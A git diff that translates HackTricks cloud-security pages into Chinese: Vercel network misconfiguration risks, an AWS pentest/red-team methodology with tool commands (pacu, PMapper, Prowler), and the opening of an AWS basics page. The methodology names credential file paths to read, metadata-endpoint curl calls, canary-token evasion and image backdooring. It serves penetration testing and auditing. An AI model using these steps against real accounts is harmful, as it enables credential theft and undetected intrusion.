data residency compliance issues, and degraded performance. -2. **Overlapping CIDR Blocks** - - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks. - - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks. -3. **Improper VPC Peering Configuration** - - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates). - - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches. -4. **Excessive Project Assignments** - - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation. - - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others. -5. **Inadequate IP Address Management** - - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately. - - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities. -6. **Including Build Containers Unnecessarily** - - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds. - - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources. -7. **Failure to Securely Handle Bypass Secrets** - - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections. - - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code. -8. **Ignoring Region Failover Configurations** - - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings. - - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency. -9. **Exceeding VPC Peering Connection Limits** - - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections). - - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions. -10. **Insecure Network Settings** - - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network. - - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks. +1. **错误的 AWS 区域选择** +- **错误配置:** 为安全计算网络选择的 AWS 区域与后端服务的区域不匹配。 +- **风险:** 延迟增加、潜在的数据驻留合规性问题和性能下降。 +2. **重叠的 CIDR 块** +- **错误配置:** 选择与现有 VPC 或其他网络重叠的 CIDR 块。 +- **风险:** 网络冲突导致连接失败、未经授权访问或网络间数据泄露。 +3. **不当的 VPC 对等配置** +- **错误配置:** 错误设置 VPC 对等(例如,错误的 VPC ID、未完成的路由表更新)。 +- **风险:** 通过错误的身份验证流程未经授权访问后端基础设施、连接失败和潜在的数据泄露。 +4. **过多的项目分配** +- **错误配置:** 在没有适当隔离的情况下将多个项目分配给单个安全计算网络。 +- **风险:** 共享 IP 暴露增加攻击面,可能允许被破坏的项目影响其他项目。 +5. **不充分的 IP 地址管理** +- **错误配置:** 未能适当管理或轮换专用 IP 地址。 +- **风险:** IP 欺骗、跟踪漏洞和如果 IP 与恶意活动相关联则可能被列入黑名单。 +6. **不必要地包含构建容器** +- **错误配置:** 在构建期间不需要后端访问时将构建容器添加到安全计算网络。 +- **风险:** 扩大攻击面、增加配置延迟和不必要的网络资源消耗。 +7. **未能安全处理绕过秘密** +- **错误配置:** 暴露或错误处理用于绕过部署保护的秘密。 +- **风险:** 未经授权访问受保护的部署,允许攻击者操纵或部署恶意代码。 +8. **忽视区域故障转移配置** +- **错误配置:** 未设置被动故障转移区域或错误配置故障转移设置。 +- **风险:** 在主要区域故障期间服务停机,导致可用性降低和潜在的数据不一致。 +9. **超过 VPC 对等连接限制** +- **错误配置:** 尝试建立超过允许限制的 VPC 对等连接(例如,超过 50 个连接)。 +- **风险:** 无法安全连接必要的后端服务,导致部署失败和操作中断。 +10. **不安全的网络设置** +- **错误配置:** 弱防火墙规则、缺乏加密或安全计算网络内的不当网络分段。 +- **风险:** 数据拦截、未经授权访问后端服务和增加攻击的脆弱性。 --- -### Environment Variables +### 环境变量 -**Purpose:** Manage environment-specific variables and secrets used by all the projects. +**目的:** 管理所有项目使用的特定于环境的变量和秘密。 -#### Security Configurations: +#### 安全配置: -- **Exposing Sensitive Variables** - - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -- **Sensitive disabled** - - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. +- **暴露敏感变量** +- **错误配置:** 用 `NEXT_PUBLIC_` 前缀敏感变量,使其在客户端可访问。 +- **风险:** API 密钥、数据库凭据或其他敏感数据暴露给公众,导致数据泄露。 +- **敏感禁用** +- **错误配置:** 如果禁用(默认),则可以读取生成的秘密的值。 +- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。 {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md index ad71de826..87bde5f7b 100644 --- a/src/pentesting-cloud/aws-security/README.md +++ b/src/pentesting-cloud/aws-security/README.md @@ -2,17 +2,17 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them. +**在开始对** AWS **环境进行渗透测试之前,您需要了解一些关于AWS工作原理的基本知识,以帮助您理解需要做什么,如何找到错误配置以及如何利用它们。** -Concepts such as organization hierarchy, IAM and other basic concepts are explained in: +组织层次结构、IAM和其他基本概念在以下内容中进行了说明: {{#ref}} aws-basic-information/ {{#endref}} -## Labs to learn +## 学习实验室 - [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat) - [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable) @@ -22,49 +22,49 @@ aws-basic-information/ - [http://flaws.cloud/](http://flaws.cloud/) - [http://flaws2.cloud/](http://flaws2.cloud/) -Tools to simulate attacks: +模拟攻击的工具: - [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/) - [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main) -## AWS Pentester/Red Team Methodology +## AWS 渗透测试者/红队方法论 -In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected. +为了审计AWS环境,了解以下内容非常重要:哪些**服务正在使用**,什么**被暴露**,谁对什么有**访问权限**,以及内部AWS服务与**外部服务**是如何连接的。 -From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that: +从红队的角度来看,**攻陷AWS环境的第一步**是设法获取一些**凭证**。以下是一些获取凭证的想法: -- **Leaks** in github (or similar) - OSINT -- **Social** Engineering -- **Password** reuse (password leaks) -- Vulnerabilities in AWS-Hosted Applications - - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint - - **Local File Read** - - `/home/USERNAME/.aws/credentials` - - `C:\Users\USERNAME\.aws\credentials` -- 3rd parties **breached** -- **Internal** Employee -- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials +- **在github(或类似平台)中的泄露** - OSINT +- **社会工程学** +- **密码**重用(密码泄露) +- AWS托管应用程序中的漏洞 +- [**服务器端请求伪造**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf)访问元数据端点 +- **本地文件读取** +- `/home/USERNAME/.aws/credentials` +- `C:\Users\USERNAME\.aws\credentials` +- 第三方**被攻破** +- **内部**员工 +- [**Cognito**](aws-services/aws-cognito-enum/#cognito)凭证 -Or by **compromising an unauthenticated service** exposed: +或者通过**攻陷一个未认证的服务**: {{#ref}} aws-unauthenticated-enum-access/ {{#endref}} -Or if you are doing a **review** you could just **ask for credentials** with these roles: +或者如果您正在进行**审查**,您可以直接**请求凭证**,使用这些角色: {{#ref}} aws-permissions-for-a-pentest.md {{#endref}} > [!NOTE] -> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: +> 在您成功获取凭证后,您需要知道**这些凭证属于谁**,以及**他们可以访问什么**,因此您需要执行一些基本的枚举: -## Basic Enumeration +## 基本枚举 ### SSRF -If you found a SSRF in a machine inside AWS check this page for tricks: +如果您在AWS内部的机器上发现了SSRF,请查看此页面以获取技巧: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf @@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou ### Whoami -One of the first things you need to know is who you are (in where account you are in other info about the AWS env): - +您需要了解的第一件事是您是谁(您所在的账户以及有关AWS环境的其他信息): ```bash # Easiest way, but might be monitored? aws sts get-caller-identity @@ -89,10 +88,9 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document ``` - > [!CAUTION] -> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\ -> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). +> 注意,公司可能会使用 **canary tokens** 来识别 **令牌被盗用和使用** 的情况。在使用令牌之前,建议检查它是否为 canary token。\ +> 更多信息请 [**查看此页面**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass)。 ### Org Enumeration @@ -102,30 +100,30 @@ aws-services/aws-organizations-enum.md ### IAM Enumeration -If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**. +如果您拥有足够的权限,**检查 AWS 账户内每个实体的权限** 将帮助您了解您和其他身份可以做什么,以及如何 **提升权限**。 -If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\ -Check **how to do the numeration and brute-forcing** in: +如果您没有足够的权限来枚举 IAM,您可以 **通过暴力破解来获取** 它们。\ +请查看 **如何进行枚举和暴力破解**: {{#ref}} aws-services/aws-iam-enum.md {{#endref}} > [!NOTE] -> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -> In the following section you can check some ways to **enumerate some common services.** +> 现在您 **已经获得了一些关于您凭据的信息**(如果您是红队,希望您 **没有被检测到**)。是时候找出环境中正在使用哪些服务。\ +> 在以下部分,您可以查看一些 **枚举常见服务** 的方法。 ## Services Enumeration, Post-Exploitation & Persistence -AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them: +AWS 拥有惊人的服务数量,在以下页面中,您将找到 **基本信息、枚举** 备忘单\*\*,\*\* 如何 **避免检测**,获取 **持久性**,以及其他 **后期利用** 技巧: {{#ref}} aws-services/ {{#endref}} -Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools). +请注意,您 **不** 需要 **手动** 执行所有工作,下面的帖子中您可以找到关于 [**自动工具**](./#automated-tools) 的 **部分**。 -Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them: +此外,在此阶段,您可能会发现 **更多暴露给未认证用户的服务**,您可能能够利用它们: {{#ref}} aws-unauthenticated-enum-access/ @@ -133,7 +131,7 @@ aws-unauthenticated-enum-access/ ## Privilege Escalation -If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in: +如果您可以 **检查至少自己的权限** 在不同资源上,您可以 **检查是否能够获得更多权限**。您应该至少关注以下权限: {{#ref}} aws-privilege-escalation/ @@ -141,10 +139,10 @@ aws-privilege-escalation/ ## Publicly Exposed Services -While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\ -As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**. +在枚举 AWS 服务时,您可能发现其中一些 **向互联网暴露元素**(虚拟机/容器端口、数据库或队列服务、快照或存储桶...)。\ +作为渗透测试者/红队成员,您应该始终检查是否可以在它们上找到 **敏感信息/漏洞**,因为它们可能为您提供 **进一步访问 AWS 账户** 的机会。 -In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in: +在本书中,您应该找到 **关于如何查找暴露的 AWS 服务以及如何检查它们的信息**。关于如何查找 **暴露网络服务中的漏洞**,我建议您 **搜索** 特定的 **服务** 在: {{#ref}} https://book.hacktricks.xyz/ @@ -154,52 +152,49 @@ https://book.hacktricks.xyz/ ### From the root/management account -When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account. +当管理账户在组织中创建新账户时,会在新账户中创建一个 **新角色**,默认命名为 **`OrganizationAccountAccessRole`**,并给予 **管理账户** 访问新账户的 **AdministratorAccess** 策略。
-So, in order to access as administrator a child account you need: +因此,要以管理员身份访问子账户,您需要: -- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin. - - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts` - - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**. -- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary). +- **攻陷** **管理** 账户并找到 **子账户的 ID** 和 **角色的名称**(默认是 OrganizationAccountAccessRole),以允许管理账户以管理员身份访问。 +- 要查找子账户,请转到 AWS 控制台中的组织部分或运行 `aws organizations list-accounts` +- 您无法直接找到角色的名称,因此请检查所有自定义 IAM 策略,并搜索任何允许 **`sts:AssumeRole` 在之前发现的子账户上** 的策略。 +- **攻陷** 管理账户中的 **主体**,并具有 **`sts:AssumeRole` 权限** 在子账户的角色上(即使该账户允许管理账户中的任何人进行冒充,由于这是外部账户,特定的 `sts:AssumeRole` 权限是必要的)。 ## Automated Tools ### Recon -- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby. - +- [**aws-recon**](https://github.com/darkbitio/aws-recon): 一个多线程的 AWS 安全专注的 **库存收集工具**,用 Ruby 编写。 ```bash # Install gem install aws_recon # Recon and get json AWS_PROFILE= aws_recon \ - --services S3,EC2 \ - --regions global,us-east-1,us-east-2 \ - --verbose +--services S3,EC2 \ +--regions global,us-east-1,us-east-2 \ +--verbose ``` - -- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. -- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues. - +- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist 是一个 **多云工具,用于获取资产**(主机名,IP 地址)来自云服务提供商。 +- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper 帮助您分析您的亚马逊网络服务(AWS)环境。它现在包含更多功能,包括安全问题的审计。 ```bash # Installation steps in github # Create a config.json file with the aws info, like: { - "accounts": [ - { - "default": true, - "id": "", - "name": "dev" - } - ], - "cidrs": - { - "2.2.2.2/28": {"name": "NY Office"} - } +"accounts": [ +{ +"default": true, +"id": "", +"name": "dev" +} +], +"cidrs": +{ +"2.2.2.2/28": {"name": "NY Office"} +} } # Enumerate @@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev python cloudmapper.py prepare #Prepare webserver python cloudmapper.py webserver #Show webserver ``` - -- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. - +- [**cartography**](https://github.com/lyft/cartography): Cartography 是一个 Python 工具,它将基础设施资产及其之间的关系整合在一个由 Neo4j 数据库驱动的直观图形视图中。 ```bash # Install pip install cartography @@ -240,17 +233,15 @@ pip install cartography # Get AWS info AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j ``` - -- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. -- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account. -- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account. +- [**starbase**](https://github.com/JupiterOne/starbase): Starbase 收集来自服务和系统的资产和关系,包括云基础设施、SaaS 应用程序、安全控制等,形成一个直观的图形视图,支持 Neo4j 数据库。 +- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (使用 python2) 这是一个工具,尝试 **发现所有** [**AWS 资源**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) 在一个账户中创建的。 +- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): 这是一个工具,用于 **获取与 AWS 账户关联的所有公共 IP 地址**(包括 IPv4/IPv6)。 ### Privesc & Exploiting -- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1). -- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict. - - Note that pacu **only checks your own privescs paths** (not account wide). - +- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** 发现扫描的 AWS 环境中最特权的用户,包括 AWS Shadow Admins。它使用 powershell。您可以在 [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1) 的 **`Check-PrivilegedPolicy`** 函数中找到 **特权策略的定义**。 +- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu 是一个开源的 **AWS 利用框架**,旨在针对云环境进行攻击性安全测试。它可以 **枚举**、查找 **错误配置** 并 **利用** 它们。您可以在 [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) 的 **`user_escalation_methods`** 字典中找到 **特权权限的定义**。 +- 请注意,pacu **仅检查您自己的 privescs 路径**(而不是账户范围内)。 ```bash # Install ## Feel free to use venvs @@ -264,9 +255,7 @@ pacu > exec iam__enum_permissions # Get permissions > exec iam__privesc_scan # List privileged permissions ``` - -- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) - +- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) 是一个脚本和库,用于识别 AWS 账户或 AWS 组织中 AWS 身份和访问管理 (IAM) 配置的风险。它将账户中的不同 IAM 用户和角色建模为有向图,从而能够检查 **权限提升** 和攻击者可能采取的获取 AWS 中资源或操作的替代路径。您可以在 [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) 中检查用于查找 privesc 路径的 **权限**,文件名以 `_edges.py` 结尾。 ```bash # Install pip install principalmapper @@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins pmapper --profile dev orgs create pmapper --profile dev orgs display ``` - -- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\ - It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use). - +- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining 是一个 AWS IAM 安全评估工具,识别最小权限的违规行为并生成风险优先级的 HTML 报告。\ +它将向您显示潜在的 **过度权限** 客户、内联和 aws **策略** 以及哪些 **主体可以访问它们**。 (它不仅检查权限提升,还检查其他有趣的权限,建议使用)。 ```bash # Install pip install cloudsplaining @@ -303,24 +290,20 @@ cloudsplaining download --profile dev # Analyze the IAM policies cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/ ``` +- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack 评估 AWS 账户的 **子域劫持漏洞**,这是由于 Route53 和 CloudFront 配置的解耦造成的。 +- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): 列出 ECR 仓库 -> 拉取 ECR 仓库 -> 后门化 -> 推送后门化镜像 +- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag 是一个工具,**搜索**公共弹性块存储 (**EBS**) 快照中的秘密,这些秘密可能被意外遗留。 -- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations. -- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image -- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in. - -### Audit - -- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins). +### 审计 +- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit 由 Aqua 开发,是一个开源项目,旨在检测云基础设施账户中的 **安全风险**,包括:亚马逊网络服务 (AWS)、微软 Azure、谷歌云平台 (GCP)、甲骨文云基础设施 (OCI) 和 GitHub(它不查找 ShadowAdmins)。 ```bash ./index.js --csv=file.csv --console=table --config ./config.js # Compiance options: --compliance {hipaa,cis,cis1,cis2,pci} ## use "cis" for cis level 1 and 2 ``` - -- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. - +- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler 是一个开源安全工具,用于执行 AWS 安全最佳实践评估、审计、事件响应、持续监控、加固和取证准备。 ```bash # Install python3, jq and git # Install @@ -331,15 +314,11 @@ prowler -v prowler prowler aws --profile custom-profile [-M csv json json-asff html] ``` - -- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure. - +- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox 帮助您在不熟悉的云环境中获得情境意识。它是一个开源命令行工具,旨在帮助渗透测试人员和其他进攻性安全专业人员在云基础设施中找到可利用的攻击路径。 ```bash cloudfox aws --profile [profile-name] all-checks ``` - -- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. - +- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite 是一个开源的多云安全审计工具,能够对云环境进行安全态势评估。 ```bash # Install virtualenv -p python3 venv @@ -350,18 +329,16 @@ scout --help # Get info scout aws -p dev ``` +- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): 云安全套件 (使用 python2.7,似乎未维护) +- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus 是一个强大的工具,用于 AWS EC2 / S3 / CloudTrail / CloudWatch / KMS 最佳加固实践 (似乎未维护)。它仅检查系统内默认配置的凭据。 -- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained) -- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system. +### 持续审计 -### Constant Audit - -- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting. -- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions. -- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response. - -## DEBUG: Capture AWS cli requests +- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian 是一个用于管理公共云账户和资源的规则引擎。它允许用户 **定义策略以启用良好管理的云基础设施**,既安全又成本优化。它将组织中许多临时脚本整合为一个轻量级和灵活的工具,具有统一的指标和报告。 +- [**pacbot**](https://github.com/tmobile/pacbot)**: 代码即政策机器人 (PacBot)** 是一个用于 **持续合规监控、合规报告和云安全自动化** 的平台。在 PacBot 中,安全和合规政策以代码形式实现。PacBot 发现的所有资源都根据这些政策进行评估,以衡量政策符合性。PacBot **自动修复** 框架提供了通过采取预定义措施自动响应政策违规的能力。 +- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert 是一个无服务器的 **实时** 数据分析框架,使您能够 **摄取、分析和警报** 来自任何环境的数据,**使用您定义的数据源和警报逻辑**。计算机安全团队使用 StreamAlert 每天扫描数 TB 的日志数据以进行事件检测和响应。 +## DEBUG: 捕获 AWS cli 请求 ```bash # Set proxy export HTTP_PROXY=http://localhost:8080 @@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem # Run aws cli normally trusting burp cert aws ... ``` - -## References +## 参考 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md index 02e6e7729..2b318a3ca 100644 --- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md @@ -1,331 +1,315 @@ -# AWS - Basic Information +# AWS - 基本信息 {{#include ../../../banners/hacktricks-training.md}} -## Organization Hierarchy +## 组织层级 ![](<../../../images/image (151).png>) -### Accounts +### 账户 -In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them. +在 AWS 中有一个 **根账户,** 它是您 **组织中所有账户的父容器**。然而,您不需要使用该账户来部署资源,您可以创建 **其他账户以将不同的 AWS** 基础设施分开。 -This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments. +从 **安全** 的角度来看,这非常有趣,因为 **一个账户无法访问其他账户的资源**(除非专门创建了桥接),因此您可以在部署之间创建边界。 -Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts. +因此,在一个组织中有 **两种类型的账户**(我们谈论的是 AWS 账户,而不是用户账户):一个被指定为管理账户的单一账户,以及一个或多个成员账户。 -- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following: +- **管理账户(根账户)** 是您用来创建组织的账户。从组织的管理账户,您可以执行以下操作: - - Create accounts in the organization - - Invite other existing accounts to the organization - - Remove accounts from the organization - - Manage invitations - - Apply policies to entities (roots, OUs, or accounts) within the organization - - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization. - - It's possible to login as the root user using the email and password used to create this root account/organization. +- 